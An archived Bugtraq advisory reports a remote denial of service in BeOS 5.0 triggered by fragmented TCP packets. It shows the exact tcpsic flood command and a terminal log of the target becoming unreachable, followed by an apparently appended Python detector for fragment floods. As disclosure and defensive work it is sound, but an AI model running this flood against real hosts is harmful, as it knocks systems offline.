Bugtraq mailing list archives
AUX Security Advisory on Be/OS 5.0 (DoS)
From: visi0n () AUX-TECH ORG (visi0n)
Date: Thu, 18 May 2000 00:55:14 -0300
AUX Technologies. Security Advisory.

Advisory: Remote Denial of Service against Be/OS.
Release Date: May 15, 2000.
Status: No fix yet.
Vulnerable version: Be/OS Personal 5.0 build feb 212000 4:43:00.
Vendor: Contacted and no answer.
Shoutz: AUX PPL(braSil rulez), dethl0k, cryonic, drk, grafspee and mike frantzen(isic), a "fuck you" to sgi (stole codes is bad for your health).

Description:

The Be/OS Operating System version 5.0 has a vulnerability in the tcp fragmentation which can lock up the entire system, needing a cold reset to work again. The bug can be reproduced using the ISIC-0.05.

[root@localhost isic-0.05]# ping 10.0.1.46
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.
64 bytes from 10.0.1.46: icmp_seq=0 ttl=255 time=7.3 ms
64 bytes from 10.0.1.46: icmp_seq=1 ttl=255 time=1.8 ms

--- 10.0.1.46 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 1.8/4.5/7.3 ms
[root@localhost isic-0.05]# ./tcpsic -s 1.1.1.1 -d 10.0.1.46 -r 31337 -F100 -V0 -I0 -T0 -u0 -t0
Compiled against Libnet 1.0.1b
Installing Signal Handlers.
Seeding with 31337
No Maximum traffic limiter
Using random source ports.
Using random destination ports.
Bad IP Version = 0% IP Opts Pcnt = 0%
Frag'd Pcnt = 100% Urg Pcnt = 0%
Bad TCP Cksm = 0% TCP Opts Pcnt = 0%

1000 @ 1802.8 pkts/sec and 1174.6 k/s
2000 @ 1636.8 pkts/sec and 1105.5 k/s
3000 @ 2110.2 pkts/sec and 1396.4 k/s
4000 @ 1689.1 pkts/sec and 1105.4 k/s
Caught signal 2
Used random seed 31337

Wrote 5002 packets in 2.74s @ 1824.48 pkts/s
[root@localhost isic-0.05]# ping 10.0.1.46
PING 10.0.1.46 (10.0.1.46) from 10.0.3.5 : 56(84) bytes of data.

--- 10.0.1.46 ping statistics ---
11 packets transmitted, 0 packets received, 100% packet loss
[root@localhost isic-0.05]#

===============================================================================
visi0n
AUX Technologies [www.aux-tech.org]
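For defenders, the traffic pattern in the advisory (TCP packets that are 100% IP fragments, arriving at roughly 1,800 packets per second) can be flagged from captured IPv4 headers. The following is an added example, not part of the advisory or of ISIC; the function names, the one-second window and the `min_pkts`/`min_ratio` thresholds are assumptions, and the sample capture is constructed.

```python
import struct
from collections import defaultdict

IPPROTO_TCP = 6

def parse_ipv4(pkt: bytes):
    """Return (dst, proto, is_fragment) from a raw IPv4 header, or None if malformed."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        return None
    flags_off, = struct.unpack("!H", pkt[6:8])
    more_fragments = bool(flags_off & 0x2000)   # MF flag
    frag_offset = flags_off & 0x1FFF            # offset in 8-byte units
    dst = ".".join(str(b) for b in pkt[16:20])
    return dst, pkt[9], more_fragments or frag_offset != 0

def fragment_flood_alerts(records, window=1.0, min_pkts=500, min_ratio=0.9):
    """records: iterable of (timestamp, raw_packet). Returns the set of
    (dst, window_index) where fragments dominate the TCP traffic to dst.
    Thresholds are assumed values; tune them to the monitored network."""
    stats = defaultdict(lambda: [0, 0])  # (dst, window) -> [tcp_total, tcp_frags]
    for ts, pkt in records:
        parsed = parse_ipv4(pkt)
        if parsed is None or parsed[1] != IPPROTO_TCP:
            continue
        dst, _, is_frag = parsed
        bucket = stats[(dst, int(ts // window))]
        bucket[0] += 1
        bucket[1] += is_frag
    return {key for key, (total, frags) in stats.items()
            if total >= min_pkts and frags / total >= min_ratio}

def make_ipv4(dst, proto, flags_off):
    """Constructed 20-byte sample header (checksum left at zero, not validated)."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, flags_off, 64, proto, 0,
                       bytes([1, 1, 1, 1]), bytes(int(x) for x in dst.split(".")))

def sample_capture():
    """Constructed capture: 1800 fragmented TCP packets in one second to 10.0.1.46,
    600 unfragmented (DF set) TCP packets to 10.0.1.47, and one ICMP packet."""
    recs = [(i / 1800.0, make_ipv4("10.0.1.46", 6, 0x2000 if i % 2 else 0x0010))
            for i in range(1800)]
    recs += [(i / 600.0, make_ipv4("10.0.1.47", 6, 0x4000)) for i in range(600)]
    recs += [(0.5, make_ipv4("10.0.1.46", 1, 0))]
    return recs
```
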